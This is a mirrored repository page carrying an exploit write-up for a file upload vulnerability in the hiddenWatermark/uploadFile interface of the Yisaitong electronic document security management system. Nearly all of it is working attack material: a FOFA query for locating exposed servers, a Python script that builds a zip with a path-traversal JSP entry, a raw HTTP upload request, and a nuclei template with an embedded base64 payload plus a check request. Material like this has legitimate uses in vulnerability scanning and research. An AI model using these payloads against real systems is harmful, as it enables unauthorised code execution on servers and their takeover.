admin/adysec_POC
1
0
Fork 0
mirror of https://github.com/adysec/POC.git synced 2025-11-05 02:13:47 +00:00
Code Issues Packages Projects Releases Wiki Activity
adysec_POC/wpoc/亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统hiddenWatermark文件上传漏洞.md
adysec 2a98e80c47 wy876 POC backup
2025-03-07 18:18:50 +08:00

101 lines
4.0 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## 亿赛通电子文档安全管理系统hiddenWatermark文件上传漏洞
亿某通电子文档安全管理系统 hiddenWatermark/uploadFile接口处存在文件上传漏洞恶意攻击者可能上传恶意文件进而获取服务器的控制权限
## fofa
```
app="亿赛通电子文档安全管理系统"
```
## 使用py文件构造压缩包脚本
```python
import zipfile
def tests(evil_file_name, zip_data):
with zipfile.ZipFile(evil_file_name, 'w') as zip_file:
for key, value in zip_data.items():
print("Key:", key)
# 重命名文件
zip_info = zipfile.ZipInfo(key)
zip_info.compress_type = zipfile.ZIP_DEFLATED
zip_file.writestr(zip_info, value)
# 定义 zipData 字典
zip_data = {
"../../../js/ceshi.jsp": "<%\n out.println(\"Hello World!\");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>",
"theme/theme/theme1.xml": "<!--{\"FileName\":\"aaa\",\"FileSize\":\"222\",\"UserName\":\"aa\",\"Department\":\"aa\",\"UserID\":\"aa\",\"time\":\"123\"}-->"
}
try:
tests("ceshi.zip", zip_data)
except Exception as e:
print(e)
```
## poc
```
POST /CDGServer3/hiddenWatermark/uploadFile HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3lm0J8uEuFHxy191
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
------WebKitFormBoundary3lm0J8uEuFHxy191
Content-Disposition: form-data; name="doc"; filename="ceshi.zip"
Content-Type: application/zip
{{file(压缩包文件路径)}}
------WebKitFormBoundary3lm0J8uEuFHxy191--
```
![3c04d6758ef8a4ed73dc917e054bfb8f](https://github.com/wy876/POC/assets/139549762/6f1b065b-3681-450c-808d-1697f494100e)
## nuclei
```
id: CDG-hiddenWatermark-uploadFile-uploadfile
info:
name: 亿某通电子文档安全管理系统 hiddenWatermark/uploadFile接口处存在文件上传漏洞 攻击者可通过该漏洞在服务器端任意执行代码 写入后门, 获取服务器权限 进而控制整个 web 服务器
author: WLF
severity: high
metadata:
fofa-query: body="/CDGServer3/index.jsp"
variables:
filename: "{{to_lower(rand_base(10))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
- raw:
- |
POST /CDGServer3/hiddenWatermark/uploadFile HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3lm0J8uEuFHxy191
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
------WebKitFormBoundary3lm0J8uEuFHxy191
Content-Disposition: form-data; name="doc"; filename="{{filename}}.zip"
Content-Type: application/zip
{{base64_decode("UEsDBBQAAAAIAAAAIQD5T26PZgAAAHAAAAAVAAAALi4vLi4vLi4vanMvY2VzaGkuanNwHcgxDsIwDAXQnVOESpXixRcoYkSMCAZmq/0CIysOqVuuD2V879Dvki/BtWkJK7k7w8zT3ZtN+46Ggk96ySqszic1ZKnVdJRQL/xAXCF2kXjmhveCOba7oa2G+DcR8YSfkGlI/fELUEsDBBQAAAAIAAAAIQDGTjiHSQAAAGcAAAAWAAAAdGhlbWUvdGhlbWUvdGhlbWUxLnhtbLNR1NWtVnLLzEn1S8xNVbJSSkxMVNIBCwRnVoEEjIyMgAKhxalFcBVAvktqQWJRSW5qXglMBKTC0wXGK8kEqzU0Mlaq1dW1AwBQSwECFAAUAAAACAAAACEA+U9uj2YAAABwAAAAFQAAAAAAAAAAAAAAgAEAAAAALi4vLi4vLi4vanMvY2VzaGkuanNwUEsBAhQAFAAAAAgAAAAhAMZOOIdJAAAAZwAAABYAAAAAAAAAAAAAAIABmQAAAHRoZW1lL3RoZW1lL3RoZW1lMS54bWxQSwUGAAAAAAIAAgCHAAAAFgEAAAAA")}}
------WebKitFormBoundary3lm0J8uEuFHxy191--
- |
GET /CDGServer3/js/ceshi.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"Hello World!")
```
Reference in New Issue View Git Blame Copy Permalink